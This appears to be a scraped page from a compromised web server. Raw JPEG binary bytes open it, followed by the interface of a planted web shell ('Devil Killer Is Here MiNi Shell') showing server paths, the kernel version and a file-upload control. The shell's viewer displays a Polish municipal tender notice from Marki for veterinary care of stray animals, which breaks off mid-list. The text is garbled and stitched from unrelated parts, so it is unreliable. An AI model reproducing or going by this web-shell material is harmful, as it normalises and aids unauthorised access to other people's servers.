JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20171127/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20171127/622693-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 622693-N-2017 z dnia 2017-11-27 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Urząd Miasta Marki</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Świadczenie usług z zakresu opieki weterynaryjnej nad zwierzętami wolnożyjącymi (kotami), bezdomnymi (psami) oraz sterylizacji, kastracji i znakowania zwierząt domowych posiadających właściciela z terenu Gminy Miasto Marki w 2018 roku w podziale na części. Liczba części 3.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Urząd Miasta Marki</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">52600900000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">al. J. Piłsudskiego</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">95</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">05270 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Marki</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">22 7811003 wew. 660</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">agnieszka.moczulska@marki.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">7811378</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.bip.marki.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.bip.marki.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.marki.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemnie</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Miasta Marki Al. Marsz. J. Piłsudskiego 95, 05-270 Marki, Kancelaria pok.13</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Świadczenie usług z zakresu opieki weterynaryjnej nad zwierzętami wolnożyjącymi (kotami), bezdomnymi (psami) oraz sterylizacji, kastracji i znakowania zwierząt domowych posiadających właściciela z terenu Gminy Miasto Marki w 2018 roku w podziale na części. Liczba części 3.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">WZP.271.52.2017</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest:Świadczenie usług z zakresu opieki weterynaryjnej nad zwierzętami wolnożyjącymi (kotami), bezdomnymi (psami) oraz sterylizacji, kastracji i znakowania zwierząt domowych posiadających właściciela z terenu Gminy Miasto Marki w 2018 roku.Zamówienie zostało podzielone na trzy części:CZĘŚĆ 1Świadczenie usług z zakresu opieki weterynaryjnej nad zwierzętami bezdomnymi z terenu Gminy Miasto Marki w 2018 roku.I. Założenia ogólne1. Każde zwierzę przyjęte do zakładu leczniczego musi mieć założoną kartę zdrowia, w której odnotowane są wszystkie wykonane zabiegi, podane leki itd.,2. Na życzenie opiekuna informacje te muszą być mu udostępnione (opiekunem jest osoba fizyczna posiadająca skierowanie, o którym mowa w par. 2 pkt 5 umowy). II. Wymagania wobec zakładu leczniczegoZakład leczniczy musi:1) posiadać uprawnienia do wykonywania określonej działalności lub czynności w ramach realizacji zamówienia objętego postępowaniem,2) prowadzić działalność na terenie Gminy Miasto Marki,3) dysponować pomieszczeniem przystosowanym do okresowego przetrzymywania zwierząt chorych, oczekujących na zabiegi itd., wyposażone w boksy, klatki, klipery itp., posiadać aparaturę i sprzęt dostosowany do zakresu świadczonych usług,4) utrzymywać stały kontakt telefoniczny z Wydziałem Ochrony Środowiska i Gospodarki Wodnej (udzielać szczegółowych informacji o przyjętych i wydanych opiekunom zwierzętach).III. Wykaz przewidywanych usług weterynaryjnych świadczonych przez zakład leczniczy:1. Badanie ogólnego stanu zdrowia zwierząt - opis odzwierciedlony w indywidualnej karcie zdrowia zwierzęcia.2. Szczepienia przeciw wściekliźnie.3. Sterylizacja/ kastracja psów.4. Znakowanie psów elektroniczne (mikrochipem).5. Odrobaczanie - według zaleceń lekarsko-weterynaryjnych.6. Odpchlenie - według zaleceń lekarsko-weterynaryjnych.7. Zabiegi lecznicze wg zlecenia i zakresu uzgodnionego każdorazowo z Wydziałem Ochrony Środowiska i Gospodarki Wodnej UM Marki.8. Eutanazja - po uzgodnieniu z Wydziałem Ochrony Środowiska i Gospodarki Wodnej UM Marki - każdy przypadek musi być udokumentowany notatką sporządzoną przez lekarza weterynarii, którą należy dołączyć do miesięcznych zestawień wykonanych usług weterynaryjnych.9. Utylizacja odpadów weterynaryjnych (zakład leczniczy musi posiadać podpisaną umowę z firmą, odbierającą odpady weterynaryjne).10. Opieka weterynaryjna zwierząt bezdomnych poszkodowanych w zdarzeniach drogowych - zakład leczniczy jest zobowiązany do sporządzenia notatki zawierającej opis wydarzenia, rodzaj obrażeń zwierzęcia i zakres wykonanych zabiegów - zgodnie z wzorem stanowiącym załącznik nr 4 do umowy. Notatkę należy dołączyć do miesięcznych zestawień wykonanych usług weterynaryjnych.IV. Zalecana procedura związana ze sterylizacją/kastracją psów.1. Badanie zwierzęcia i na tej podstawie kwalifikowanie zwierząt do zabiegów.2. Zabieg sterylizacji/kastracji zabezpieczenie antybiotykowe.CZĘŚĆ 2Świadczenie usług z zakresu opieki weterynaryjnej nad zwierzętami wolnożyjącymi z terenu Gminy Miasto Marki - kotami w 2018 roku.I. Założenia ogólne1. Każde zwierzę przyjęte do zakładu leczniczego musi mieć założoną kartę zdrowia, w której odnotowane są wszystkie wykonane zabiegi, podane leki itd.2. Na życzenie opiekuna informacje te muszą być mu udostępnione (opiekunem jest osoba fizyczna posiadająca skierowanie, o którym mowa w par. 1 ust. 5 umowy).II. Wymagania wobec zakładu leczniczegoZakład leczniczy musi:1) posiadać uprawnienia do wykonywania określonej działalności lub czynności w ramach realizacji zamówienia objętego postępowaniem,2) prowadzić działalność na terenie Gminy Miasto Marki,3) dysponować pomieszczeniem przystosowanym do okresowego przetrzymywania zwierząt chorych, oczekujących na zabiegi itd., wyposażone w boksy, klatki, klipery itp., posiadać aparaturę i sprzęt dostosowany do zakresu świadczonych usług, Zamawiający nie dopuszcza możliwości transportu zwierząt do innego zakładu leczniczego, zabiegi powinny być wykonywane w tym samym zakładzie leczniczym, w którym odbywać się będzie dalsza hospitalizacja zwierzęcia,4) zapewnić dom tymczasowy lub adopcję zwierząt na podstawie umowy adopcyjnej pomiędzy lecznicą lub fundacją, z którą lecznica współpracuje, a adoptującym (na koszt Zamawiającego może zostać przeprowadzona sterylizacja/kastracja zgodnie z cennikiem wynikającym z oferty),5) posiadać podpisaną umowę z firmą, odbierającą odpady weterynaryjne w tym zwłoki, lekarstwa itp.,6) utrzymywać stały kontakt telefoniczny z Wydziałem Ochrony Środowiska i Gospodarki Wodnej (udzielać szczegółowych informacji o przyjętych i wydanych opiekunom zwierzętach),7) sprawdzać, czy zwierzę nie jest oznakowane elektronicznie,8) nie powinno się socjalizować kotów dzikich. Są one leczone, a następnie wypuszczane do środowiska w miejscu znalezienia lub odłowienia. Jednakże w przypadku kotów (zwłaszcza kociąt), które z racji np. długotrwałej terapii oswoiły się, należy uzgodnić z Zamawiającym dalsze postępowanie (przekazanie do adopcji lub pod opiekę organizacji pro zwierzęcej, ewentualnie do Schroniska). Dotyczy to także kotów kalekich, które z racji odniesionych obrażeń, nie dadzą sobie rady w środowisku naturalnym,9) Wykonawca ma obowiązek przeprowadzić każdemu dostarczonemu kotu test FIV Ab/FeLV Ag służący wykrywania antygenu wirusa białaczki (FeLV) i przeciwciał wirusa niedoboru immunologicznego (FIV) kotów w surowicy, osoczu lub krwi (testy zapewnia Wykonawca). III. Wykaz przewidywanych usług weterynaryjnych świadczonych przez zakład leczniczy1. Wszystkie zwierzęta wolno żyjące dostarczone do lecznicy muszą przejść badania ogólnego stanu zdrowia.2. Badanie ogólnego stanu zdrowia obejmuje (koszt zabiegu musi uwzględniać wszystkie koszty związane z wykonaniem poniższych zabiegów): ?	pomiar temperatury,?	osłuchanie zwierzęcia,?	badanie powłok skórny, ?	ocena uzębienia,?	określenie wieku i płci zwierzęcia,?	ocena stanu gałek ocznych, jamy ustnej i uszu,?	wykonanie testu w kierunku FiV i FelV, w związku z koniecznością wyeliminowania chorych zwierząt (testy zapewnia Wykonawca), ?	znakowanie poprzez nacięcie małżowiny usznej,?	odrobaczenie (według zaleceń lekarsko-weterynaryjnych), ?	odpchlenie (leki według zaleceń lekarsko-weterynaryjnych), ?	założenie książeczki zdrowia.3. Szczepienie kociąt przeciwko wirusowym chorobom zakaźnym - koszt zabiegu musi uwzględniać wszystkie koszty związane z wykonaniem zabiegu. Nie wykonuje się żadnych szczepień u dorosłych kotów ze względu na możliwość ponownego zaszczepienia w zbyt krótkim terminie zwierzęcia które np. trafi do lecznicy po wypadku, a wcześniej było leczone i zaszczepione w innym zakładzie leczniczym. 4. Sterylizacja/kastracja kotów i pooperacyjna opieka lekarsko-weterynaryjna - koszt zabiegu musi uwzględniać wszystkie koszty związane z wykonaniem zabiegu i leczeniem zwierzęcia, w tym wszystkie niezbędne do tego celu materiały.5.1. Zabiegi operacyjno-chirurgiczne I np.: amputacja głowy kości udowej, amputacja ogona, odprowadzenie wpadniętej pochwy, odprowadzenie wpadniętej odbytnicy, usunięcie gałki ocznej, złamanie gałęzi żuchwy, złamanie kości miednicy, złamanie kości przedramienia, złamanie kości podudzia, złamanie kręgów ogonowych, złamanie kości ramiennej, złamanie kości udowej, RTG, USG, badanie krwi i moczu (wg zaleceń lekarsko-weterynaryjnych), inne leczenie (w przypadku wykrycia choroby), koszty zabiegów muszą uwzględniać wszystkie koszty związane z wykonaniem zabiegu, w tym wszystkie niezbędne do tego celu materiały.5.2. Zabiegi operacyjno-chirurgiczne II np.: amputacja palca, chirurgiczne opracowanie ran, ropomacicze, ropień gałki ocznej, ropień małżowiny usznej, wrzód rogówki, RTG, USG, badanie krwi i moczu (wg zaleceń lekarsko-weterynaryjnych), inne leczenie (w przypadku wykrycia choroby), koszty zabiegów muszą uwzględniać wszystkie koszty związane z wykonaniem zabiegu, w tym wszystkie niezbędne do tego celu materiały.6. Inne zabiegi ambulatoryjne (leczenie np.: grzybicy skóry, świerzbu, kataru kociego, usunięcie kleszcza, zapalenie spojówek, zapalenie rogówki, zapalenie naczyniówki, RTG, USG, badanie krwi i moczu (wg zaleceń lekarsko-weterynaryjnych)), koszt zabiegu musi uwzględniać wszystkie koszty związane z wykonaniem zabiegu, w tym wszystkie niezbędne do tego celu materiały.7. Pobyt zwierzęcia w lecznicy (całkowity kosz pobytu zwierzęcia w lecznicy - 1 doby, w tym między innymi karma, obroża, opieka, materiały itp. - wszystkie te elementy musi uwzględniać cena pobytu [1 doby]).8. Inne zabiegi ratujące życie wg zlecenia i zakresu uzgodnionego każdorazowo z Wydziałem Ochrony Środowiska i Gospodarki Wodnej UM Marki.9. Eutanazja (bez względu na masę ciała zwierzęcia)/uśpienie ślepego miotu (bez względu na liczebność miotu) - po uzgodnieniu z Wydziałem Ochrony Środowiska i Gospodarki Wodnej UM Marki - każdy przypadek musi być udokumentowany notatką sporządzoną przez lekarza weterynarii, którą należy dołączyć do miesięcznych zestawień wykonanych usług weterynaryjnych (koszt zabiegu musi uwzględniać wszystkie koszty związane z wykonaniem zabiegu, materiały, w tym między innymi koszt utylizacji i transportu zwłok zwierzęcych do miejsca utylizacji).10. Opieka weterynaryjna zwierząt wolnożyjących poszkodowanych w zdarzeniach drogowych - zakład leczniczy zobowiązany jest do sporządzenia notatki zawierającej opis wydarzenia, rodzaj obrażeń i zakres wykonanych zabiegów, którą należy dołączyć do faktury za wykonanie usługi.IV. Zalecana procedura związana ze sterylizacją/kastracją kotów1. Badanie zwierzęcia oraz przeprowadzenie wywiadu z opiekunem i na tej podstawie kwalifikowanie zwierząt do zabiegów.2. Zabieg sterylizacji/kastracji (u kotek preferowane jest cięcie boczne), zabezpieczenie antybiotykowe.3. Wypuszczenie kota do środowiska po 3 dniach po zabiegu (w zależności od stanu zdrowia). W przypadku sterylizacji kotki po 7 dniach. Na prośbę opiekuna koty mogą być wydane wcześniej.4. W przypadku młodych kotów nienadających się do zabiegów sterylizacji/kastracji należy je zwrócić opiekunowi/domowi tymczasowemu do czasu możliwego przeprowadzenia zabiegu.CZĘŚĆ 3Wykonanie zabiegów sterylizacji i kastracji kotów i psów domowych, posiadających właściciela (w tym znakowanie zwierząt) w 2018 roku.I. Założenia ogólne1. Każde zwierzę przyjęte do zakładu leczniczego musi mieć założoną kartę zdrowia, w której odnotowane są wszystkie wykonane zabiegi, podane leki itd.,2. Na życzenie opiekuna informacje te muszą być mu udostępnione (opiekunem jest osoba fizyczna posiadająca skierowanie, o którym mowa w par. 1 ust. 5 umowy). II. Wymagania wobec zakładu leczniczegoZakład leczniczy musi:1) Posiadać uprawnienia do wykonywania określonej działalności lub czynności w ramach realizacji zamówienia objętego postępowaniem,2) Utrzymywać stały kontakt telefoniczny z Wydziałem Ochrony Środowiska i Gospodarki Wodnej (udzielać szczegółowych informacji o przyjętych i wydanych opiekunom zwierzętach).3) Siedziba zakładu leczniczego musi się znajdować do 20 km od siedziby zamawiającego. III. Wykaz przewidywanych usług weterynaryjnych świadczonych przez zakład leczniczy:1. Wykonanie badania ogólnego stanu zdrowia, w tym zweryfikowanie, czy zwierzę nadaje się do wykonania planowanego zabiegu, na które udzielono skierowania. 2. Sterylizacja/kastracja psów i kotów domowych, posiadających właściciela. Przewidywana liczba zwierząt objętych zamówieniem:1) koty domowe, posiadające właściciela:?	sterylizacja: 60 sztuk,?	kastracja: 60 sztuk,?	znakowanie: 120 sztuk,2) psy domowe, posiadające właściciela:?	sterylizacja <25kg: 30 sztuk,?	sterylizacja >25kg: 20 sztuk,?	kastracja <25kg: 28 sztuk,	?	